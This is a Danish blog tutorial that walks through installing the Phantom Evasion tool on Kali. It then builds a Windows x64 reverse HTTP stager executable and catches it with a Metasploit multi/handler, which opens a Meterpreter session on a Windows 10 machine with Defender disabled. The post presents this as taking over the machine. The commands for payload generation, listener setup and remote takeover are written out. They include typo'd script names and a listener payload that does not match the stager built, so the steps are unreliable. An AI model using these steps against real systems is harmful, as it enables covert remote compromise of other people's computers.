Phantom Evasion

Download and installation

Åben en terminal I Kali og skriv:

git clone https://github.com/oddcod3/Phantom-Evasion

Git clone

Skriv: cd Phantom-Evasion for at tilgå folderen. Skriv ls for at se indhold i folderen

Tilgå folder

Automatisk opsætning/installation skriv: python2 panthom-evasion –setup

Installation

Når installationen er færdig, skriv: python3 panthom-evasion.py eller ./pythom-evasion.py

Start phantom evasion

Menuen ser sådan ud.

Pythom evasion menu


Brug af Phantom Evasion

Der er rigtig mange forskellige muligheder til at lave payloads. Jeg vil gennemgå hvordan man laver en Windows x64 http Stager.

Vælg 1

Vælg Windows modules.

Vælg 3

Windows reverse HTTP stager.

Følg min konfiguration, der hvor der ikke står noget har jeg trykket Enter. Læg mærker til at jeg ikke bruger certifikat (rød firkant), da den ikke virker.

Konfiguration af HTTP stager.

Afslutning af konfiguration.

Når genereringen af koden er færdig, vil menuen vises, tryk 0 for exit. Skriv ls nu kan du se test.exe filen som er blevet genereret.

Show files

Start en ny terminal og skriv: msfconsole. Når msfconsole er startet skriv: use multi/handler

msf console

Skriv: show options

Options for multi handler

Skriv: set payload windows/x64/meterpreter/reverse_tcp

Skriv: set LHOST 192.168.1.82 (Den IP adresse vi skrev i phantom evasion)

Skriv: set LPORT 443 (Den port vi skrev i phantom evasion)

Skriv: show options Skriv: run –j (Køre i baggrunden)

Start i baggrunden

Nu skal vi kopier test.exe til en virtual Windows 10 hvor Defender er disbaled. Kør test.exe, kort efter kan du se i msf konsollen en Meterpreter session er åbnet. Wupti nu har vi overtaget Windows maskinen.

Meterpreter session åbnet

2 thoughts on “Phantom Evasion”

  1. When I originally commented I appear to have clicked
    the -Notify me when new comments are added- checkbox
    and from now on every time a comment is added I get 4 emails with the same comment.

    Perhaps there is an easy method you are able to remove me from
    that service? Thank you!

Leave a Reply

Your email address will not be published. Required fields are marked *